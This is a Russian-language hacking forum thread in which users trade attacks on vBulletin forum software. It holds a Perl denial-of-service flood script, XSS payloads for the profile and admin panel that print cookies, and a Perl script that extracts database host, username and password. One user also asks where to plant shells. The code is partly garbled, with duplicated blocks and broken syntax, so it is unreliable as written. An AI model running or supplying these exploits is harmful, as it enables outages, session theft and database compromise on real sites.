 |
|

01.10.2010, 10:28
|
|
Новичок
Регистрация: 30.04.2010
Сообщений: 8
С нами:
8438441
Репутация:
0
|
|
и то не все сообщения
Т.к. при отправке через страницу профиля, сообщение будет только тому отправлятся, с чьего профиля отсылают
А если в строке ник нейма будут вводить ник, то появится оригинальный и ложный, которым ты создал, и если он выберет твой ложный ник, то придёт тебе сообщения, а так ники в списке одинаковые.
|
|
|

01.10.2010, 13:05
|
|
Новичок
Регистрация: 29.06.2010
Сообщений: 11
С нами:
8353046
Репутация:
0
|
|
Сообщение от RAISh
и то не все сообщения
Т.к. при отправке через страницу профиля, сообщение будет только тому отправлятся, с чьего профиля отсылают
А если в строке ник нейма будут вводить ник, то появится оригинальный и ложный, которым ты создал, и если он выберет твой ложный ник, то придёт тебе сообщения, а так ники в списке одинаковые.
к нику присваивается id?
|
|
|

11.10.2010, 10:44
|
|
Постоянный
Регистрация: 16.05.2009
Сообщений: 309
С нами:
8940779
Репутация:
112
|
|
Сообщение от farent12
Ребят, помогите, есть шеллы под этот форум, кто-что посоветует как быстро код вставить и куда?
/thread220278.html
|
|
|

03.12.2010, 15:17
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами:
10158236
Репутация:
0
|
|
[QUOTE="ph1l1ster"]
vBulletin® Version 3.8.2 Denial of Service Exploit
Код:
#!usr/bin/perl
#vBulletin® Version 3.8.2 Denial of Service Exploit
#ea$y Laster
########################################################################
# Modules #
########################################################################
use IO::SOCKET; # Object interface #
########################################################################
if (@ARGVvBulletin® Version 3.8.2);
chomp($ziel =);
if ($ziel eq""){
die "$fehler\a\n";}
print"$block\n";
print"$block\n";
print q(Path->);
chomp($path =);
if ($path eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print "Verwundbarkeit\n";
print"forumdisplay.php?f=\n";
print"->"n;
chomp($vul =);
if ($vul eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print q(Time->);
chomp($flood =);
if ($flood eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print q(Port->);
chomp($port =);
if ($port eq ""){
die "$fehler \n";}
print"$block\n";
print q(Send "start"->);
chomp($start =);
if ($start eq "") {
die "$fehler\n";}
print "$block\a\n";
print "[+]Konntroliere Daten \n";
print "[*]Kontroliere Ziel : $ziel\n";
print "[*]Kontroliere Board : $path\n";
print "[*]Kontroliere Port : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
PeerAddr => "$ziel",
PeerPort => "$port",
Proto => "tcp",
);
print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUTvBulletin® Version 3.8.2);
chomp($ziel =);
if ($ziel eq""){
die "$fehler\a\n";}
print"$block\n";
print"$block\n";
print q(Path->);
chomp($path =);
if ($path eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print "Verwundbarkeit\n";
print"forumdisplay.php?f=\n";
print"->"n;
chomp($vul =);
if ($vul eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print q(Time->);
chomp($flood =);
if ($flood eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print q(Port->);
chomp($port =);
if ($port eq ""){
die "$fehler \n";}
print"$block\n";
print q(Send "start"->);
chomp($start =);
if ($start eq "") {
die "$fehler\n";}
print "$block\a\n";
print "[+]Konntroliere Daten \n";
print "[*]Kontroliere Ziel : $ziel\n";
print "[*]Kontroliere Board : $path\n";
print "[*]Kontroliere Port : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
PeerAddr => "$ziel",
PeerPort => "$port",
Proto => "tcp",
);
print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUT"n;
Может надо так?
p.s. кавычку не туда поставил...
|
|
|

04.12.2010, 22:04
|
|
Новичок
Регистрация: 26.11.2010
Сообщений: 16
С нами:
8137046
Репутация:
-1
|
|
vBulletin 4.0.8 - Persistent XSS via Profile
vBulletin - Persistent Cross Site Scripting via Profile
Versions Affected: 4.0.8 (3.8.* is not vulnerable.)
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability
does not exist and the installation of vBulletin is thereby secure.
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
[1] Private Reflected XSS:
An attacker can inject scripts in a simple way, which is only visible to the attacker.
Proof of Concept:
url()
(This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)
[2] Global Reflected XSS:
An attacker can inject malicious CSS data executing javascript, which is then visible
to anyone browsing the user profile. Even guests visiting the malicious user profile.
Proof of Concept: (IE6 only, may not work in IE7+ and FF)
url(/);background:url(javascript:document.write(1337))
url(/);width:expression(alert('www.intern0t.net'))
Please note that some of these strings may be too long to be injected. However a
blog entry at Exploit-DB and a video on YouTube will be released very soon.
-:: Solution ::-
Turn off profile customization immediately for users able to customize their profile!
When a security patch has been provided by the vendor, enable this feature again.
Взято с www.exploit-db.com/exploits/15550/
|
|
|

10.12.2010, 00:47
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами:
8784803
Репутация:
257
|
|
vBulletin Version 3.8.4 AdminCP
Стили и шаблоны-Сохранить/загрузить стили
загружаем стиль, в поле "Название для загруженного стиля"пишем
alert (document.cookie);
когда выберем на форуме последний загруженный стиль - увидим алерт и свои куки, так же как и в админке
Языки и фразы-Сохранить/загрузить языки
В поле "Название загружаемого языка" пишем alert (document.cookie);
"Перезаписать язык" выбираем "Создать новый"
выбираем файл языка, загружаем
идём по адресу http://ваш_форум и видим свои куки, алерт
Разделы и модераторы-Добавить раздел
в поля "Заголовок" и "Описание" пишем alert (document.cookie);
нажимаем "Сохранить"
Видим два алерта на главной, и один в админке по адресу Разделы и модераторы-Управление разделами(последний выполнился у меня в ие, в опере не было)
Основные настройки-Основные настройки, Название сайта / Ссылка / Контактная информация
в поле "Текст авторских прав" пишем alert (document.cookie);
нажимаем сохранить
на главной видим алерт
Объявления-Создать новое объявление
Раздел (будет добавлено и в подразделы) оставляем по-дефолту(Во всех разделах)
в поле "Заголовок" и поле "Текст" вбиваем alert (document.cookie);
нажимаем "Сохранить"
Заходим в любой раздел и видим алерт
Дополнительные поля профиля-Добавить дополнительное поле профиля
Тип поля профиля-Текстовое поле одной строкой, нажимаем "Продолжить"
в поле "Заголовок", "Значение по умолчанию" и "Описание" вставляем alert (document.cookie);
Какая страница отображает эту опцию? выбираем то, что вам подходит. я же выбрал "Редактировать данные"
Нажимаем "Сохранить"
по линку http://ваш_форум/profile.php?do=editprofile видим два алерта
|
|
|

13.02.2011, 18:32
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
vBulletin 3.8.6 Exploit
Код:
#!/usr/bin/perl
use strict;
use LWP::Simple;
use HTML::Parser;
use Data::Dumper;
my $url = shift @ARGV;
my $line;
die "No URL specified on command line." unless (defined $url);
my $url2 = "$url\/install\/vbulletin-language.xml";
my $content = get($url2); #put site html in $content.
die "get failed" if (!defined $content);
if ($content =~ m/database_ingo/) {
$url2 = "$url\/faq.php\?s=\&do=search\&q=data\&match=all\&titlesonly=0";
$content = get($url2);
die "Get Failed" if (!defined $content);
open(MYDATA, ">aaaaa.txt");
print MYDATA $content;
close MYDATA;
open(NEDATA, ") {
if ($line =~ m/Host:/) {
$line =~ s/Database\//;
$line =~ s/\//;
print "$line\n";
}
if ($line =~ m/Username:/) {
$line =~ s/Database//;
$line =~ s///;
print "$line\n";
}
if ($line =~ m/Password:/) {
$line =~ s/Database//;
$line =~ s///;
print "$line\n";
}
}
close NEDATA;
unlink($url2);
} else {
print "Not vulnerable!\n";
};
_____________________________________________
How to use?
my $content = get($url2)
my $content = get('http://wowcewebsite.com/path/')
_____________________________________________*
|
|
|

17.02.2011, 20:50
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от NeW
Какаие есть уязвимости в 3.8.2, кроме DoS'а?
_http://www.exploit-db.com/shellcode/ сложно ведь правда поискать?
|
|
|

22.02.2011, 00:27
|
|
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
С нами:
8990166
Репутация:
14
|
|
foozi не пашет
No URL specified on command line. at C:\perl\1.pl line 8.
|
|
|

27.02.2011, 04:55
|
|
Новичок
Регистрация: 26.10.2009
Сообщений: 17
С нами:
8706185
Репутация:
27
|
|
Slay90, поправь ошибку в 8-й строке скрипта
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|